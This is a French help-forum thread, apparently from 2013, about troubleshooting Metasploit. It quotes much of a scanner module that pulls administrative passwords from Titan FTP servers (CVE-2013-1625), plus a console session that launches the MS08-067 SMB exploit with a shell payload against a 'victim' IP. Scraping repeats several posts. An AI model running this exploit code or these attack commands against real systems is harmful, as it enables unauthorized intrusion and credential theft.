Metasploit, un peu d'aide ne me ferais pas de mal !!
Fermé
316079
Messages postés
16
Date d'inscription
vendredi 14 septembre 2012
Statut
Membre
Dernière intervention
12 avril 2013
-
14 févr. 2013 à 19:27
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013 - 11 mars 2013 à 18:59
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013 - 11 mars 2013 à 18:59
A voir également:
- Metasploit, un peu d'aide ne me ferais pas de mal !!
- Pourquoi la tnt fonctionne mal en ce moment - Guide
- Metasploit pro - Télécharger - Divers Utilitaires
- Tu ferais pareil torrent ✓ - Forum Téléchargement
- Url mal - Forum Virus
- Flux tu ferais pareil - Forum Réseau
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
14 févr. 2013 à 19:57
14 févr. 2013 à 19:57
Salut,
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
316079
Messages postés
16
Date d'inscription
vendredi 14 septembre 2012
Statut
Membre
Dernière intervention
12 avril 2013
Modifié par 316079 le 15/02/2013 à 17:52
Modifié par 316079 le 15/02/2013 à 17:52
Merci pour ta réponse,
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
In / Home / ...-Pc / metasploit / modules / auxiliary / scanner / http / titan_ftp_admin_pwd.rb: 40: syntax error, unexpected ')'
Delete the comma at the end of line 39 and run it again
Delete the comma at the end of line 39 and run it again
316079
Messages postés
16
Date d'inscription
vendredi 14 septembre 2012
Statut
Membre
Dernière intervention
12 avril 2013
11 mars 2013 à 18:59
11 mars 2013 à 18:59
ok thanks for your answer.
I understand now the meening of the number "40" !!
I understand now the meening of the number "40" !!